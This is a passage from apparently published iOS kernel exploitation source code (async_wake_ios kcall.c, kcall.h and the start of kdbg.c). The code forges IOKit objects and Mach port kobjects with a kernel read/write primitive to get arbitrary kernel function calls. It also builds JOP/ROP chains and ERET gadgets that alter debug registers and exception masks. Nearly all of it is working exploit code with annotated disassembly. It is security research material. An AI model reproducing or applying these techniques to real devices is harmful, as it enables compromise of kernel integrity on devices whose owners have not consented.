arg0); 57 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, arg1), arg1); 58 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, fptr), fptr); 59 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, retain), ksym(KSYMBOL_RET)); 60 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, release), ksym(KSYMBOL_OSSERIALIZER_SERIALIZE)); 61 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, ign), 0); 62 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, get_meta_class), ksym(KSYMBOL_OSARRAY_GET_META_CLASS)); 63 | for (int i = 1; i < 0xff; i++) { 64 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, get_meta_class) + (i*8), 0x1010101010101000+(i*4)); 65 | } 66 | 67 | // allocate a port 68 | mach_port_t port = MACH_PORT_NULL; 69 | kern_return_t err; 70 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 71 | if (err != KERN_SUCCESS) { 72 | printf("failed to allocate port\n"); 73 | return; 74 | } 75 | 76 | // get a send right 77 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 78 | 79 | // locate the port 80 | uint64_t port_addr = find_port_address(port, MACH_MSG_TYPE_COPY_SEND); 81 | 82 | // change the type of the port 83 | #define IKOT_IOKIT_OBJECT 30 84 | #define IO_ACTIVE 0x80000000 85 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_IOKIT_OBJECT); 86 | 87 | // cache the current space: 88 | uint64_t original_space = rk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 89 | 90 | // change the space of the port 91 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); 92 | 93 | // set the kobject 94 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), obj_kaddr); 95 | 96 | // call an iokit method 97 | IOIteratorReset(port); 98 | 99 | // clear the kobject 100 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), 0); 101 | 102 | // reset the space 103 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), original_space); 104 | 105 | // reset the type 106 | #define IKOT_NONE 0 107 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_NONE); 108 | 109 | // release the port 110 | mach_port_destroy(mach_task_self(), port); 111 | 112 | // free the fake object 113 | kmem_free(obj_kaddr, sizeof(struct fake_iokit_obj)+0x800); 114 | } 115 | 116 | void test_kcall() { 117 | uint64_t test_buf = kmem_alloc(0x20); 118 | wk64(test_buf, 0x4141414141414141); 119 | wk64(test_buf+8, 0); 120 | kcall(ksym(KSYMBOL_UUID_COPY), test_buf+8, test_buf); 121 | uint64_t read_val = rk64(test_buf+8); 122 | printf("read_val: %llx\n", read_val); 123 | kmem_free(test_buf, 0x20); 124 | } 125 | #endif 126 | 127 | /* 128 | __TEXT_EXEC:__text:FFFFFFF0073EB130 _csblob_get_cdhash ; DATA XREF: com.apple.driver.AppleMobileFileIntegrity:__got:AppleMobileFileIntegrity_GOT__csblob_get_cdhasho 129 | __TEXT_EXEC:__text:FFFFFFF0073EB130 ; com.apple.security.sandbox:__got:sandbox_GOT__csblob_get_cdhasho 130 | __TEXT_EXEC:__text:FFFFFFF0073EB130 ADD X0, X0, #0x40 131 | __TEXT_EXEC:__text:FFFFFFF0073EB134 RET 132 | */ 133 | 134 | mach_port_t arbitrary_call_port = MACH_PORT_NULL; 135 | uint64_t obj_kaddr = 0; 136 | 137 | // the iokit_user_client_trap method. 138 | // this lets you pass up to 7 uint64_t arguments 139 | // the return value will be truncated to 32-bits 140 | // see arm_set_mach_syscall_ret for why: 141 | // static void 142 | // arm_set_mach_syscall_ret(struct arm_saved_state *state, int retval) 143 | // { 144 | // if (is_saved_state32(state)) { 145 | // saved_state32(state)->r[0] = retval; 146 | // } else { 147 | // saved_state64(state)->x[0] = retval; 148 | // } 149 | // } 150 | // that compiles to: 151 | // STR W20, [X19,#8] <-- 32-bit store 152 | 153 | uint64_t kcall(uint64_t fptr, uint32_t argc, ...) { 154 | uint64_t args[7] = {0}; 155 | va_list ap; 156 | va_start(ap, argc); 157 | 158 | if (argc > 7) { 159 | printf("too many arguments to kcall\n"); 160 | return 0; 161 | } 162 | 163 | for (int i = 0; i < argc; i++){ 164 | args[i] = va_arg(ap, uint64_t); 165 | } 166 | 167 | va_end(ap); 168 | 169 | if (arbitrary_call_port == MACH_PORT_NULL) { 170 | // build the object: 171 | // allocate some memory to hold a fake iokit object: 172 | obj_kaddr = early_kalloc(0x1000); 173 | printf("kcall object allocated via early_kalloc at %llx\n", obj_kaddr); 174 | 175 | // fill in the fields: 176 | wk64(obj_kaddr + 0, obj_kaddr+0x800); // vtable pointer 177 | 178 | // IOExternalTrap 179 | wk64(obj_kaddr + 0x50, 0); // the function pointer is actually a pointer-to-member-method, so needs a 0 here too 180 | // see this old bug where I discuss pointer-to-member-methods: 181 | // https://bugs.chromium.org/p/project-zero/issues/detail?id=20 182 | 183 | wk32(obj_kaddr + 0x9c, 0x1234); // __ipc 184 | 185 | // vtable: 186 | wk64(obj_kaddr + 0x800 + 0x20, ksym(KSYMBOL_RET)); // vtable::retain 187 | wk64(obj_kaddr + 0x800 + 0x28, ksym(KSYMBOL_RET)); // vtable::release 188 | wk64(obj_kaddr + 0x800 + 0x38, ksym(KSYMBOL_IOUSERCLIENT_GET_META_CLASS)); // vtable::getMetaClass 189 | wk64(obj_kaddr + 0x800 + 0x5b8, ksym(KSYMBOL_CSBLOB_GET_CD_HASH)); // vtable::getExternalTrapForIndex 190 | wk64(obj_kaddr + 0x800 + 0x5c0, ksym(KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX)); 191 | 192 | // allocate a port 193 | kern_return_t err; 194 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &arbitrary_call_port); 195 | if (err != KERN_SUCCESS) { 196 | printf("failed to allocate port\n"); 197 | return 0; 198 | } 199 | 200 | // get a send right 201 | mach_port_insert_right(mach_task_self(), arbitrary_call_port, arbitrary_call_port, MACH_MSG_TYPE_MAKE_SEND); 202 | 203 | // locate the port 204 | uint64_t port_addr = find_port_address(arbitrary_call_port, MACH_MSG_TYPE_COPY_SEND); 205 | 206 | // change the type of the port 207 | #define IKOT_IOKIT_CONNECT 29 208 | #define IO_ACTIVE 0x80000000 209 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_IOKIT_CONNECT); 210 | 211 | // cache the current space: 212 | //uint64_t original_space = rk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 213 | 214 | // change the space of the port 215 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); 216 | 217 | // set the kobject 218 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), obj_kaddr); 219 | } 220 | 221 | // put arg0 and the function pointer in the right place 222 | wk64(obj_kaddr + 0x40, args[0]); 223 | wk64(obj_kaddr + 0x48, fptr); 224 | 225 | // call the external trap: 226 | uint64_t return_val = iokit_user_client_trap(arbitrary_call_port, 0, 227 | args[1], 228 | args[2], 229 | args[3], 230 | args[4], 231 | args[5], 232 | args[6]); 233 | 234 | printf("return val %llx\n", return_val); 235 | 236 | #if 0 237 | // clear the kobject 238 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), 0); 239 | 240 | // reset the space 241 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), original_space); 242 | 243 | // reset the type 244 | #define IKOT_NONE 0 245 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_NONE); 246 | 247 | // release the port 248 | mach_port_destroy(mach_task_self(), port); 249 | #endif 250 | 251 | return return_val; 252 | } 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | -------------------------------------------------------------------------------- /async_wake_ios/kcall.h: -------------------------------------------------------------------------------- 1 | #ifndef kcall_h 2 | #define kcall_h 3 | 4 | void kprintstr(char* msg); 5 | void test_kcall(void); 6 | //void kcall(uint64_t fptr, uint64_t arg0, uint64_t arg1); 7 | uint64_t kcall(uint64_t fptr, uint32_t argc, ...); 8 | #endif 9 | -------------------------------------------------------------------------------- /async_wake_ios/kdbg.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "kdbg.h" 7 | #include "kutils.h" 8 | #include "kmem.h" 9 | #include "symbols.h" 10 | #include "kcall.h" 11 | #include "find_port.h" 12 | #include "early_kalloc.h" 13 | #include "arm64_state.h" 14 | 15 | /* 16 | A thread-local iOS kernel debugger for all ARM64 devices 17 | 18 | This code uses a kernel memory read-write primitve to enable a hardware breakpoint in EL1 on a particular thread. 19 | 20 | When that bp triggers it will eventually end up stuck in a loop: 21 | 22 | case ESR_EC_BKPT_REG_MATCH_EL1: 23 | if (FSC_DEBUG_FAULT == ISS_SSDE_FSC(esr)) { 24 | kprintf("Hardware Breakpoint Debug exception from kernel. Hanging here (by design).\n"); 25 | for (;;); 26 | 27 | That thread will eventually get preempted; when that happens we'll find its state (from userspace) and modify it 28 | such that it breaks out of that loop and continues with the desired state. 29 | 30 | Doing this requires careful attention to how aarch64 exceptions work, how XNU handles nested exceptions 31 | and how context switching works. A description of this is given below: 32 | 33 | AArch64 Exceptions: 34 | There are four classes of AArch64 exceptions: Synchronous, IRQ, FIQ, SError. These exceptions are the only 35 | way which the CPU will transition between Exception Levels (EL.) There are four Exception Levels: EL0, EL1, 36 | EL2, EL3. In iOS userspace runs in EL0 and the kernel runs in EL1. These are similar to the Ring 0 & Ring 3 37 | in x86. All 64-bit iOS devices below iPhone 7 also contain a secure monitor which runs in EL3. 38 | 39 | Exception types: 40 | 41 | Synchronous: These are things like SVC instructions (used for syscalls), breakpoints, data aborts etc 42 | IRQ: These are external interrupts from devices 43 | FIQ: These are also external interrupts 44 | SError: These are system errors, things like ECC errors 45 | 46 | For our purposes we're interested in Synchronous and FIQ interrupts. Hardware breakpoints are synchronous exceptions. 47 | The timer which drives the scheduler is attached as an FIQ source. 48 | 49 | Aarch64 further subdivides those four exception classes into another four categories depending on where the 50 | exception came from: 51 | a) Exception came from the current exception level which was running on SP_EL0 52 | b) Exception came from the current exception level which was running on SP_EL1 53 | c) Exception came from a lower exception level which was executing in AArch64 mode 54 | d) Exception came from a lower exception level which was executing in AArch32 mode 55 | 56 | Each of these 16 cases has their own vector (handling routine.) 57 | 58 | sp registers: 59 | sp isn't a general purpose register; it's better to view it as an alias for one of four seperate hardware registers: 60 | SP_EL0, SP_EL1, SP_EL2, SP_EL3. 61 | 62 | When an exception is taken sp will be set to name the SP_ELX register for the exception level which the exception is taken to. 63 | For example, when userspace (EL0) makes a syscall (Synchronous exception to EL1 from lower exception level) sp will name SP_EL1 in the handler. 64 | 65 | To enable nested exceptions code generally switches back to using SP_EL0 regardless of which exception level it's actually 66 | running at (obviously after first saving the original value of SP_EL0 so it can be restored.) 67 | 68 | Nested exceptions and masking: 69 | 70 | The four PSTATE.{A,D,F,I} bits control exception masking. Whenever any exception is taken these four bits will be set. 71 | 72 | PSTATE.A: SError interrupts will be pended until this bit is cleared 73 | PSTATE.F: FIQ interrupts will be pended until this bit is cleared 74 | PSTATE.I: IRQ interrupts will be pended until this bit is cleared 75 | PSTATE.D: Debug interrupts will be suppressed until this bit is cleared 76 | 77 | These bits can be manually set/cleared by writing to the DAIFSet/DAIFClr msrs. The bits will also be restored to their saved value 78 | during an ERET (return from exception) from the SPSR_ELX register (where X is the EL the exception was taken to.) 79 | 80 | Synchronous exceptions which are not Debug exceptions cannot be masked. However Debug exceptions will be suppressed, and XNU doesn't re-enable 81 | them. This presents the first major hurdle to implementing this debugger as the exceptions generated by hardware breakpoints fall in to 82 | the Debug category and will therefore never generate exceptions even if we set them and enable them for EL1. 83 | 84 | Note that the Debug exceptions will be suppresssed, that is, they will never fire, unlike the other maskable interrupts which will just be pended 85 | and will fire as soon as they are un-masked. 86 | 87 | Re-enabling Debug exceptions during syscall execution: 88 | The trick to clearing PSTATE.D is to fake a return from an exception by calling ERET using a arbitrary-call primitive. 89 | 90 | See below in the code for exactly the right gadget which will let us restore a complete register state (including CPSR.) 91 | 92 | With PSTATE.D cleared we point pc back to near the start of the syscall handling path so we can fake the execution of an arbitrary 93 | syscall. 94 | 95 | There are a couple of other things preventing HW breakpoints firing: 96 | 97 | The Kernel Debug Enable bit has to be set in MDSCR_EL1. This can be set with some simple ROP. It's per-core, and it won't be cleared if we get 98 | scheduled off so it's sufficient to just set it once. 99 | 100 | We can use the thread_set_state API to set a breakpoint on a kernel address, but it sanitizes the BCRX control flags so it's also 101 | necessary to set ARM_DBG_CR_MODE_CONTROL_ANY using the kernel memory r/w. 102 | 103 | Finding a modifying the stuck thread state: 104 | This is explained below. We pin a monitor thread to the same core as the debugee then search the debugee's kernel stack looking for the 105 | set of stack frames which indicate it's got stuck in the kernel hw bp hit infinite loop. 106 | 107 | We then expose the state at the bp to a callback which can modify it before unblocking the stuck kernel thread. 108 | 109 | Limitations: 110 | I only wrote code to support one breakpoint at the moment, expect a fuller-featured, interactive version soon! 111 | 112 | Don't set breakpoints when things like spinlocks are held, it will go very badly. 113 | 114 | Single-step won't work. In the breakpoint handler you have to emulate the instruction and manually move pc on. 115 | 116 | It's slow! This is unlikely to change give how it works, but hey, you're modifying kernel thread state from userspace on the same machine! 117 | 118 | */ 119 | 120 | // scheduling mach trap to yield the cpu 121 | extern boolean_t swtch_pri(int pri); 122 | 123 | // pin the current thread to a processor, returns a pointer to the processor we're pinned to 124 | uint64_t pin_current_thread() { 125 | // get the current thread_t: 126 | uint64_t th = current_thread(); 127 | 128 | #if 0 129 | // get the processor_t this thread last ran on 130 | uint64_t processor = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR)); 131 | printf("thread %llx last ran on %llx, pinning it to that core\n", th, processor); 132 | 133 | // this is probably fine... 134 | wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); 135 | #endif 136 | 137 | // need the struct cpu_data for that processor which is stored in the CpuDataEntries array, declared in data.s 138 | // it's 6*4k in to the data segment 139 | uint64_t cpu_data_entries = ksym(KSYMBOL_CPU_DATA_ENTRIES); 140 | 141 | int cpu_id = 0; 142 | 143 | // it's an array of cpu_data_entry_t which contains just the 64-bit physical and virtual addresses of struct cpu_data 144 | uint64_t cpu_data = rk64(cpu_data_entries + ((cpu_id * 0x10) + 8)); 145 | 146 | uint64_t processor = rk64(cpu_data + koffset(KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR)); 147 | printf("trying to pin to cpu0: %llx\n", processor); 148 | // pin to that cpu 149 | // this is probably fine... 150 | wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); 151 | 152 | // that binding will only take account once we get scheduled off and back on again so yield the cpu: 153 | printf("pin_current_thread yielding cpu\n"); 154 | swtch_pri(0); 155 | printf("pin_current_thread back on cpu\n"); 156 | uint64_t chosen = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); 157 | printf("running on %llx\n", chosen); 158 | 159 | #if 0 160 | // should now be running on the chosen processor, and should only get scheduled on there: 161 | printf("we're running again!\n"); 162 | 163 | 164 | int got_switched = 0; 165 | for (int i = 0; i < 1000; i++) { 166 | swtch_pri(0); 167 | uint64_t p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); 168 | if (p != processor) { 169 | printf("got moved off target processor\n"); 170 | got_switched = 1; 171 | break; 172 | } 173 | usleep(15000); 174 | p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); 175 | if (p != processor) { 176 | printf("got moved off target processor\n"); 177 | got_switched = 1; 178 | break; 179 | } 180 | } 181 | if (!got_switched) { 182 | printf("looks like pinning works!\n"); 183 | } 184 | #endif 185 | return processor; 186 | } 187 | 188 | #if 0 189 | 190 | use the two argument arbitrary call to call this: 191 | __TEXT_EXEC:__text:FFFFFFF0070CC1AC MOV X21, X0 192 | __TEXT_EXEC:__text:FFFFFFF0070CC1B0 MOV X22, X1 193 | __TEXT_EXEC:__text:FFFFFFF0070CC1B4 BR X22 194 | 195 | that gives control of x21 and pc 196 | 197 | point pc to this: 198 | 199 | exception_return: 200 | msr DAIFSet, #(DAIFSC_IRQF | DAIFSC_FIQF) // Disable interrupts 201 | mrs x3, TPIDR_EL1 // Load thread pointer 202 | mov sp, x21 // Reload the pcb pointer 203 | 204 | /* ARM64_TODO Reserve x18 until we decide what to do with it */ 205 | ldr x0, [x3, TH_CTH_DATA] // Load cthread data pointer 206 | str x0, [sp, SS64_X18] // and use it to trash x18 207 | 208 | Lexception_return_restore_registers: 209 | /* Restore special register state */ 210 | ldr x0, [sp, SS64_PC] // Get the return address 211 | ldr w1, [sp, SS64_CPSR] // Get the return CPSR 212 | ldr w2, [sp, NS64_FPSR] 213 | ldr w3, [sp, NS64_FPCR] 214 | 215 | msr ELR_EL1, x0 // Load the return address into ELR 216 | msr SPSR_EL1, x1 // Load the return CPSR into SPSR 217 | msr FPSR, x2 218 | msr FPCR, x3 // Synchronized by ERET 219 | 220 | mov x0, sp // x0 = &pcb 221 | 222 | /* Restore arm_neon_saved_state64 */ 223 | ldp q0, q1, [x0, NS64_Q0] 224 | ldp q2, q3, [x0, NS64_Q2] 225 | ldp q4, q5, [x0, NS64_Q4] 226 | ldp q6, q7, [x0, NS64_Q6] 227 | ldp q8, q9, [x0, NS64_Q8] 228 | ldp q10, q11, [x0, NS64_Q10] 229 | ldp q12, q13, [x0, NS64_Q12] 230 | ldp q14, q15, [x0, NS64_Q14] 231 | ldp q16, q17, [x0, NS64_Q16] 232 | ldp q18, q19, [x0, NS64_Q18] 233 | ldp q20, q21, [x0, NS64_Q20] 234 | ldp q22, q23, [x0, NS64_Q22] 235 | ldp q24, q25, [x0, NS64_Q24] 236 | ldp q26, q27, [x0, NS64_Q26] 237 | ldp q28, q29, [x0, NS64_Q28] 238 | ldp q30, q31, [x0, NS64_Q30] 239 | 240 | /* Restore arm_saved_state64 */ 241 | 242 | // Skip x0, x1 - we're using them 243 | ldp x2, x3, [x0, SS64_X2] 244 | ldp x4, x5, [x0, SS64_X4] 245 | ldp x6, x7, [x0, SS64_X6] 246 | ldp x8, x9, [x0, SS64_X8] 247 | ldp x10, x11, [x0, SS64_X10] 248 | ldp x12, x13, [x0, SS64_X12] 249 | ldp x14, x15, [x0, SS64_X14] 250 | ldp x16, x17, [x0, SS64_X16] 251 | ldp x18, x19, [x0, SS64_X18] 252 | ldp x20, x21, [x0, SS64_X20] 253 | ldp x22, x23, [x0, SS64_X22] 254 | ldp x24, x25, [x0, SS64_X24] 255 | ldp x26, x27, [x0, SS64_X26] 256 | ldr x28, [x0, SS64_X28] 257 | ldp fp, lr, [x0, SS64_FP] 258 | 259 | // Restore stack pointer and our last two GPRs 260 | ldr x1, [x0, SS64_SP] 261 | mov sp, x1 262 | ldp x0, x1, [x0, SS64_X0] // Restore the GPRs 263 | 264 | eret 265 | 266 | this lets us eret with a completely controlled state :) 267 | 268 | use that to clear PSTATE.D, and return to EL1+SP0 269 | 270 | return to: 271 | 272 | .text 273 | .align 2 274 | fleh_synchronous: 275 | mrs x1, ESR_EL1 // Load exception syndrome 276 | mrs x2, FAR_EL1 // Load fault address 277 | and w3, w1, #(ESR_EC_MASK) 278 | lsr w3, w3, #(ESR_EC_SHIFT) 279 | mov w4, #(ESR_EC_IABORT_EL1) 280 | cmp w3, w4 281 | b.eq Lfleh_sync_load_lr 282 | Lvalid_link_register: <-- ***there*** 283 | 284 | PUSH_FRAME 285 | bl EXT(sleh_synchronous) 286 | POP_FRAME 287 | 288 | b exception_return_dispatch 289 | 290 | in ip7 11.1.2 that's: 291 | __TEXT_EXEC:__text:FFFFFFF0070CC1D4 STP X29, X30, [SP,#var_10]! 292 | __TEXT_EXEC:__text:FFFFFFF0070CC1D8 MOV X29, SP 293 | __TEXT_EXEC:__text:FFFFFFF0070CC1DC BL loc_FFFFFFF0071DDED4 294 | __TEXT_EXEC:__text:FFFFFFF0070CC1E0 MOV SP, X29 295 | __TEXT_EXEC:__text:FFFFFFF0070CC1E4 LDP X29, X30, [SP+0x10+var_10],#0x10 296 | __TEXT_EXEC:__text:FFFFFFF0070CC1E8 B sub_FFFFFFF0070CC3CC 297 | 298 | in the state which we get loaded: 299 | x21 should point to the actual saved ACT_CONTEXT since x21 will be used in the return path if no ASTs are taken 300 | x0 should point to the saved state which we want the debugged syscall to see (not ACT_CONTEXT!) 301 | x1 should be the svn syndrome number (ESR_EC(esr) == ESR_EC_SVC_64) 302 | x2 should be the pc of the svc instruction 303 | sp should be the right place on the thread's kernel stack 304 | 305 | #endif 306 | 307 | 308 | struct syscall_args { 309 | uint32_t number; 310 | uint64_t arg[8]; 311 | }; 312 | 313 | void do_syscall_with_pstate_d_unmasked(struct syscall_args* args) { 314 | // get the target thread_t 315 | //uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND); 316 | //uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 317 | 318 | uint64_t thread_t_addr = current_thread(); 319 | 320 | /* this state should set up as if it were calling the target syscall */ 321 | arm_context_t fake_syscall_args = {0}; 322 | 323 | /* this state will be restored by an eret */ 324 | arm_context_t eret_return_state = {0}; 325 | 326 | // there's no need to initialize too much of this since it won't actually be the state which is restored 327 | // it just needs to be enough to get the target syscall called 328 | fake_syscall_args.ss.ss_64.x[16] = args->number; 329 | fake_syscall_args.ss.ss_64.x[0] = args->arg[0]; 330 | fake_syscall_args.ss.ss_64.x[1] = args->arg[1]; 331 | fake_syscall_args.ss.ss_64.x[2] = args->arg[2]; 332 | fake_syscall_args.ss.ss_64.x[3] = args->arg[3]; 333 | fake_syscall_args.ss.ss_64.x[4] = args->arg[4]; 334 | fake_syscall_args.ss.ss_64.x[5] = args->arg[5]; 335 | fake_syscall_args.ss.ss_64.x[6] = args->arg[6]; 336 | fake_syscall_args.ss.ss_64.x[7] = args->arg[7]; 337 | 338 | fake_syscall_args.ss.ash.flavor = ARM_SAVED_STATE64; 339 | 340 | fake_syscall_args.ss.ss_64.cpsr = 0; 341 | 342 | // allocate a copy of that in wired kernel memory: 343 | //uint64_t fake_syscall_args_kern = kmem_alloc_wired(sizeof(arm_context_t)); 344 | uint64_t fake_syscall_args_kern = early_kalloc(sizeof(arm_context_t)); 345 | kmemcpy(fake_syscall_args_kern, (uint64_t)&fake_syscall_args, sizeof(arm_context_t)); 346 | 347 | // this state needs to be a bit more complete... 348 | // x0 of the eret restored state will be the arm_context_t which the syscall dispatch code sees 349 | eret_return_state.ss.ss_64.x[0] = fake_syscall_args_kern; 350 | 351 | // x1 will be the exception syndrome 352 | #define ESR_EC_SVC_64 0x15 353 | #define ESR_EC_SHIFT 26 354 | eret_return_state.ss.ss_64.x[1] = ESR_EC_SVC_64 << ESR_EC_SHIFT; 355 | 356 | // x2 will be the address of the exception, not relevant for a syscall 357 | eret_return_state.ss.ss_64.x[2] = 0x454545454540; 358 | 359 | // x21 will be the real saved state to be used to return back to EL0 360 | // this is the state which was spilled during the actual EL0 -> EL1 transition. 361 | // if a continuation is run x21 won't be used, instead the return will go via the thread's ACT_CONTEXT 362 | // so this makes both paths safe 363 | uint64_t act_context = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_CONTEXT_DATA)); 364 | eret_return_state.ss.ss_64.x[21] = act_context; 365 | 366 | // let's stay on the thread's actual kernel stack 367 | uint64_t thread_kernel_stack_top = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR)); 368 | eret_return_state.ss.ss_64.sp = thread_kernel_stack_top; 369 | 370 | // the target place to eret to (see code snippet above) 371 | eret_return_state.ss.ss_64.pc = ksym(KSYMBOL_VALID_LINK_REGISTER); 372 | 373 | // the whole point of this, cpsr! this will be restored to SPSR_EL1 before the eret 374 | // see D1.6.4 of the armv8 manual 375 | // we want to return on to SP0 and to EL1 376 | // A,I,F should still be masked, D unmasked 377 | #define SPSR_A (1<<8) 378 | #define SPSR_I (1<<7) 379 | #define SPSR_F (1<<6) 380 | #define SPSR_EL1_SP0 (0x4) 381 | eret_return_state.ss.ss_64.cpsr = SPSR_A | SPSR_I | SPSR_F | SPSR_EL1_SP0; 382 | 383 | //uint64_t eret_return_state_kern = kmem_alloc_wired(sizeof(arm_context_t)); 384 | uint64_t eret_return_state_kern = early_kalloc(sizeof(arm_context_t)); 385 | kmemcpy(eret_return_state_kern, (uint64_t)&eret_return_state, sizeof(arm_context_t)); 386 | 387 | // make the arbitrary call 388 | kcall(ksym(KSYMBOL_X21_JOP_GADGET), 2, eret_return_state_kern, ksym(KSYMBOL_EXCEPTION_RETURN)); 389 | } 390 | 391 | 392 | /* 393 | we want to call this gadget: 394 | FFFFFFF0071E1998 MSR #0, c0, c2, #2, X8 ; [>] MDSCR_EL1 (Monitor Debug System Control Register) 395 | FFFFFFF0071E199C ISB // this a workaround for some errata... 396 | FFFFFFF0071E19A0 B loc_FFFFFFF0071E19F8 397 | ... 398 | FFFFFFF0071E19F8 BL _ml_set_interrupts_enabled 399 | FFFFFFF0071E19FC ADD SP, SP, #0x220 400 | FFFFFFF0071E1A00 LDP X29, X30, [SP,#0x20+var_s0] 401 | FFFFFFF0071E1A04 LDP X20, X19, [SP,#0x20+var_10] 402 | FFFFFFF0071E1A08 LDP X28, X27, [SP+0x20+var_20],#0x30 403 | FFFFFFF0071E1A0C RET 404 | 405 | lets just use the ERET case to get full register control an run that on a little ROP stack which then 406 | returns to thread_exception_return 407 | 408 | */ 409 | void set_MDSCR_EL1_KDE(mach_port_t target_thread_port) { 410 | /* this state will be restored by an eret */ 411 | arm_context_t eret_return_state = {0}; 412 | 413 | // allocate a stack for the rop: 414 | //uint64_t rop_stack_kern_base = kmem_alloc_wired(0x4000); 415 | uint64_t rop_stack_kern_base = early_kalloc(0x1000); 416 | 417 | uint64_t rop_stack_kern_middle = rop_stack_kern_base + 0xc00; 418 | 419 | eret_return_state.ss.ss_64.sp = rop_stack_kern_middle; 420 | uint64_t rop_stack_kern_popped_base = rop_stack_kern_middle + 0x220; 421 | // x28, x27, x20, x19, fp, lr 422 | uint64_t popped_regs[] = {0, 0, 0, 0, 0x414243444546, ksym(KSYMBOL_THREAD_EXCEPTION_RETURN)}; // directly return back to userspace after this 423 | kmemcpy(rop_stack_kern_popped_base, (uint64_t)popped_regs, sizeof(popped_regs)); 424 | 425 | #define MDSCR_EL1_KDE (1<<13) 426 | eret_return_state.ss.ss_64.x[8] = MDSCR_EL1_KDE; 427 | 428 | // the target place to eret to 429 | eret_return_state.ss.ss_64.pc = ksym(KSYMBOL_SET_MDSCR_EL1_GADGET); 430 | 431 | // we want to return on to SP0 and to EL1 432 | // A,I,F should still be masked, D unmasked (here we could actually mask D?) 433 | #define SPSR_A (1<<8) 434 | #define SPSR_I (1<<7) 435 | #define SPSR_F (1<<6) 436 | #define SPSR_EL1_SP0 (0x4) 437 | eret_return_state.ss.ss_64.cpsr = SPSR_A | SPSR_I | SPSR_F | SPSR_EL1_SP0; 438 | 439 | //uint64_t eret_return_state_kern = kmem_alloc_wired(sizeof(arm_context_t)); 440 | uint64_t eret_return_state_kern = early_kalloc(sizeof(arm_context_t)); 441 | kmemcpy(eret_return_state_kern, (uint64_t)&eret_return_state, sizeof(arm_context_t)); 442 | 443 | // make the arbitrary call 444 | kcall(ksym(KSYMBOL_X21_JOP_GADGET), 2, eret_return_state_kern, ksym(KSYMBOL_EXCEPTION_RETURN)); 445 | 446 | printf("returned from trying to set the KDE bit\n"); 447 | 448 | // free the stack we used: 449 | //kmem_free(rop_stack_kern_base, 0x4000); 450 | } 451 | 452 | 453 | 454 | /* 455 | target_thread_port is the thread port for a thread which may or already has hit a kernel hw breakpoint. 456 | detect whether that is the case, and if so find the register state when the BP was hit. 457 | 458 | where to find stuff: 459 | 460 | userspace svc: EL0+SP0 -> EL1+SP1 (sync exception from lower exception level running aarch64) 461 | userspace state gets saved in thread->ACT_CONTEXT 462 | stack switched to thread's kernel stack pointer and SP0 selected 463 | does stuff which then hits kernel hw bp 464 | 465 | kernel hw bp: EL1+SP0 -> EL1+SP1 (sync exception from same exception level running on SP0) 466 | switch back to SP0 and push new arm_context_t on the there. point x21 to this saved state area. 467 | control flow reaches infinite loop 468 | 469 | fiq timer: EL1+SP0 -> EL1+SP1 (fiq interrupt from same exception level running on SP0) 470 | switch back to SP0 and push new arm_context_t on there. point x21 to there. 471 | then set sp to the interrupt stack. 472 | 473 | schedule off: 474 | this will happen just before the fiq timer interrupt returns in return_to_kernel 475 | it will set sp back to x21 (as if to eret back to the previous exception level) then call ast_taken_kernel 476 | 477 | if the thread will be scheduled off just a small amount of state will be saved to the reserved area 478 | above the top of the thread's kernel stack, sufficient to get the thread back on the core and 479 | resume execution. 480 | 481 | 482 | +-----------------------------+ 483 | | | 484 | | struct thread_kernel_state | <-- *above* the top of thread kernel stack 485 | | | 486 | +> +=============================+ <-- top of thread kernel stack 487 | | | | 